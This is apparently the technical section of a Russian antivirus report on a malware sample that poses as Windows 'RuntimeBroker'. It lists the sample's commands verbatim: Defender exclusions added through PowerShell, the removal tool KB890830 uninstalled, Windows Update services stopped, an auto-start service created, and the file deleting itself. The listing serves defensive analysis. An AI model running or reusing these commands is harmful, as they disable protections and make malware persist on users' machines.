Техническая информация
- [HKLM\System\CurrentControlSet\Services\RuntimeBroker] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\RuntimeBroker] 'ImagePath' = '%ALLUSERSPROFILE%\RuntimeBroker.exe'
- 'RuntimeBroker' %ALLUSERSPROFILE%\RuntimeBroker.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- %ALLUSERSPROFILE%\runtimebroker.exe
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\sc.exe' delete "RuntimeBroker"
- '<SYSTEM32>\sc.exe' create "RuntimeBroker" binpath= "%ALLUSERSPROFILE%\RuntimeBroker.exe" start= "auto"
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3 & Del "<Полный путь к файлу>"
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3